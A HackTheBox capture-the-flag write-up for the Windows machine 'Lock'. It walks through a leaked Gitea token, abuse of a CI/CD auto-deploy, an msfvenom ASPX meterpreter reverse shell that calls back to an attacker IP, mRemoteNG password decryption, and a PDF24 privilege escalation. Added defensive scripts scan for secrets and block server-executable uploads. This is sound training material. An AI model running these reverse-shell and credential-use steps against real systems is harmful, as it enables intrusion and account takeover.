HackTheBox - Lock

Updated 29-03-2026

A Windows machine where a personal access token buried in a Gitea repository’s commit history unlocks a CI/CD pipeline — and a commercial PDF utility’s privilege escalation flaw delivers the final blow.

Nmap

$ sudo nmap -sC -sV -p22,3000,445,3389 10.129.234.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-13 04:21 EST
Nmap scan report for 10.129.234.64
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Lock - Index
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=cb0cbe8585860085; Path=/; HttpOnly;
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-13T09:24:26+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2026-02-13T09:23:47+00:00
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2026-02-12T09:09:06
|_Not valid after: 2026-08-14T09:09:06

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-02-13T09:23:47
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.16 seconds

Foothold

There is nothing particularly interesting on port 80.

Browsing to http://10.129.234.64:3000/ reveals a Gitea instance running version 1.21.3.

While exploring repositories, we find one called dev-scripts containing a single file: repos.py.

Reviewing the commit history reveals a Personal Access Token exposed in the initial commit:

PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'
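The token above was found by reading the commit history by hand; a defender can automate that check over every clone. The scanner below is an added example, not part of this writeup or of the dev-scripts repository: it walks `git log -p --all` output, reports added lines that look like a Gitea personal access token, and redacts the value in the report. The sample log is constructed, with a placeholder token.

```python
import re

# Patterns for the secret type leaked on this box: a 40-hex-character Gitea
# personal access token assigned to a variable, plus a lower-confidence
# catch-all for any bare 40-hex string (which also matches SHA-1 hashes).
SECRET_PATTERNS = {
    "gitea-pat": re.compile(r"(?i)(?:token|pat|secret)\w*\s*=\s*['\"]([0-9a-f]{40})['\"]"),
    "hex40": re.compile(r"\b([0-9a-f]{40})\b"),
}

def redact(value):
    """Keep only the ends of a secret so the report never reproduces it."""
    return value[:4] + "..." + value[-4:]

def scan_patch_text(patch):
    """Walk `git log -p` output and report every added line that matches.
    A value deleted in a later commit still shows up: history keeps it."""
    findings, commit, path = [], "", ""
    for line in patch.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            path = line[4:].removeprefix("b/")
        elif line.startswith("+") and not line.startswith("+++"):
            for kind, pattern in SECRET_PATTERNS.items():
                match = pattern.search(line)
                if match:
                    findings.append({"commit": commit[:7], "file": path,
                                     "type": kind, "value": redact(match.group(1))})
                    break  # one report per line, highest-confidence pattern first
    return findings

# Constructed sample log: a token is committed, then "removed" in a later
# commit. Only the initial commit adds it, so only that commit is reported.
SAMPLE_LOG = """\
commit 2222222bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
--- a/repos.py
+++ b/repos.py
-PERSONAL_ACCESS_TOKEN = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
+PERSONAL_ACCESS_TOKEN = os.environ['GITEA_TOKEN']
commit 1111111aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
--- /dev/null
+++ b/repos.py
+PERSONAL_ACCESS_TOKEN = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
"""

if __name__ == "__main__":
    for finding in scan_patch_text(SAMPLE_LOG):
        print(finding)
```

Against a real clone, feed it `git log -p --all` output; the same function works unchanged.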

Enumerating Private Repositories

Using the leaked token, we query the Gitea API:

$ curl -X GET "http://10.129.234.64:3000/api/v1/user/repos" \
-H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" \
-H "Accept: application/json" | jq

The response shows a private repository:

ellen.freeman/website

Cloning the Private Repository

We can clone the private repository using the access token:

$ git clone http://ellen.freeman:43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.234.64:3000/ellen.freeman/website.git

Inside the repository, the readme.md file contains:

$ cat readme.md 
# New Project Website

CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver

This indicates that commits are automatically deployed to the IIS webroot.
In other words, any file pushed to the repository will be served by the web server.
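One mitigation for the auto-deploy behaviour described above is to gate what the pipeline may publish. The allow-list check below is an added example, not part of this writeup or of the box's pipeline; it assumes it runs as a Gitea pre-receive hook that reads `<old> <new> <ref>` lines on stdin, and it rejects server-executable IIS content, IIS configuration files and paths that leave the webroot before a push can reach the web server.

```python
import posixpath
import subprocess
import sys

# Allow-list of what a static site may contain. Anything else, in particular
# server-executable IIS handlers, is rejected before it reaches the webroot.
ALLOWED_EXTENSIONS = {".html", ".htm", ".css", ".js", ".png", ".jpg", ".jpeg",
                      ".gif", ".svg", ".ico", ".woff", ".woff2", ".md", ".txt"}
# Extensions IIS hands to a script engine; matched anywhere in the name so
# that "shell.aspx.html" style double extensions are rejected as well.
SERVER_EXEC = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".cshtml", ".php",
               ".dll", ".exe", ".ps1", ".bat", ".cmd"}
BLOCKED_NAMES = {"web.config", "global.asax"}  # IIS configuration, any case

def deploy_gate(paths):
    """Return {path: reason} for every changed file that must not be deployed."""
    rejected = {}
    for raw in paths:
        norm = posixpath.normpath(raw.replace("\\", "/"))
        name = posixpath.basename(norm).lower()
        parts = ["." + p for p in name.split(".")[1:]]
        if posixpath.isabs(norm) or norm == ".." or norm.startswith("../"):
            rejected[raw] = "path escapes the webroot"
        elif name in BLOCKED_NAMES:
            rejected[raw] = "IIS configuration file"
        elif any(p in SERVER_EXEC for p in parts):
            rejected[raw] = "server-executable content"
        elif not parts or parts[-1] not in ALLOWED_EXTENSIONS:
            rejected[raw] = "extension not in static allow-list"
    return rejected

def changed_files(old, new, repo="."):
    """Files touched between two revisions, as a pre-receive hook sees them."""
    out = subprocess.run(["git", "-C", repo, "diff", "--name-only", old, new],
                         capture_output=True, text=True, check=True).stdout
    return out.split()

if __name__ == "__main__":
    # Assumption: invoked as a pre-receive hook, one "<old> <new> <ref>" per line.
    for line in sys.stdin:
        old, new, _ref = line.split()
        bad = deploy_gate(changed_files(old, new))
        for path, why in bad.items():
            print(f"rejected {path}: {why}", file=sys.stderr)
        if bad:
            sys.exit(1)
```

A push that creates a new branch arrives with an all-zero old revision, which `git diff` cannot resolve; a production hook would diff against the empty tree in that case.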


Testing Automatic Deployment

We replace index.html with test content:

$ echo "<h1>test</h1>" > index.html

Configure Git and push the changes:

$ git config --global user.name "test"
$ git config --global user.email "test"
$ git add .
$ git commit -m "test"
$ git push

Verify deployment:

$ curl 10.129.234.64
<h1>test</h1>

The updated content is served, confirming automatic deployment.


Achieving Remote Code Execution

Since IIS is the web server, we can upload a malicious .aspx web shell to gain RCE.

Generate a reverse shell:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.103 LPORT=1234 -f aspx > shell.aspx

Commit and push:

$ git add .
$ git commit -m "shell"
$ git push

Start a Metasploit listener:

$ msfconsole -q -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.103; set LPORT 1234; run"

Trigger the shell:

$ curl 10.129.234.64/shell.aspx

A Meterpreter session is successfully opened.


Credential Discovery

Inside ellen.freeman's Documents folder, we find config.xml, which belongs to mRemoteNG.

The file contains a saved RDP session for user gale.dekarios with an encrypted password.
mRemoteNG uses AES-GCM encryption.

We can use this online tool or mremoteng-decrypt to recover the password.

The decrypted password is:

ty8wnW9qCKDosXo6

RDP Access

Using these credentials:

$ xfreerdp /v:10.129.234.64 /u:gale.dekarios /p:ty8wnW9qCKDosXo6

We obtain desktop access and retrieve the user flag.


Privilege Escalation

We notice PDF24 Creator installed on the system.
The version is 11.15.1.

PDF24 Creator 11.15.1 is vulnerable to CVE-2023-49147, which allows a local unprivileged user to escalate privileges to SYSTEM through a chain of actions when installed via MSI.

Searching the system reveals:

C:\_install\pdf24-creator-11.15.1-x64.msi

This confirms MSI installation.

Following this PoC, we are able to spawn a SYSTEM command prompt and reset the Administrator password:

net user Administrator *

Administrator Access

Authenticate via RDP:

$ xfreerdp /v:10.129.234.64 /u:Administrator /p:Abc123!

Root flag successfully obtained.


Attack Chain Summary

  1. Personal Access Token exposed in Gitea commit history
  2. Token allowed access to a private repository
  3. CI/CD auto-deployment enabled arbitrary file upload
  4. Uploaded malicious ASPX web shell → gained Meterpreter session
  5. Extracted and decrypted credentials from mRemoteNG config
  6. Identified vulnerable PDF24 Creator installation (CVE-2023-49147)
  7. Escalated to SYSTEM and reset Administrator password

Key Takeaways

  • Secrets committed to Git remain accessible in repository history
  • Personal Access Tokens should be scoped minimally and rotated immediately if exposed
  • CI/CD pipelines can become RCE vectors when repository access is compromised
  • Encrypted credential storage (like mRemoteNG) may still be recoverable
  • Local software enumeration is critical for privilege escalation
  • MSI-installed applications may introduce unintended escalation paths